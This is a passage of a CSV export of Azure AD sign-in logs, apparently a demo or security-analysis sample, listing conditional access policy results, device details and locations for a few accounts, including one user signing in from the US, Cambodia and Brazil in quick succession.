['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",db359221-fdda-4bf1-8b37-6f46fafc0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,db359221-fdda-4bf1-8b37-6f46fafc0900,SigninLogs,Sucess,36.6404686,-78.26995087
+1398,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:58.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c95450b3-582d-4306-9dd2-9bda40fc0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype Presence Service,c95450b3-582d-4306-9dd2-9bda40fc0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1399,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:21.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1d016429-3b6f-46d4-9940-8ee5f9c290a8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",11a868c6-5405-4103-99d2-d5c4f6a10700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11a868c6-5405-4103-99d2-d5c4f6a10700,SigninLogs,Sucess,13,105
+1400,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8d298c27-e905-4e09-a129-768a5fec15d5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5710832e-d5f6-411b-b39c-0449a4400700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5710832e-d5f6-411b-b39c-0449a4400700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1401,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3684e1dd-791e-4d72-9b15-2e4b085de467,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft 365 Security and Compliance Center,80ccca67-54bd-44ab-8625-4b79c4dc7775,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a052e7e-2284-4115-9ddd-003f89560700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5a052e7e-2284-4115-9ddd-003f89560700,SigninLogs,Sucess,50.6406517,5.572050095
+1402,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8882928-55f1-4f63-837c-438ca28267a9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",41cc5746-ae7e-445a-962a-17f6b17e0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,41cc5746-ae7e-445a-962a-17f6b17e0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1403,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfe57034-1217-4265-b88c-f70e1fa80133,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbcd7f19-25f4-4cfd-824c-94dc919b0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbcd7f19-25f4-4cfd-824c-94dc919b0700,SigninLogs,Sucess,36.6404686,-78.26995087
+1404,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:58.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",a90d7024-2f24-4b85-b726-7a30cf7b0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,a90d7024-2f24-4b85-b726-7a30cf7b0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1405,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,77bfa0eb-2059-43df-a2b4-7f23ffb40de5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, 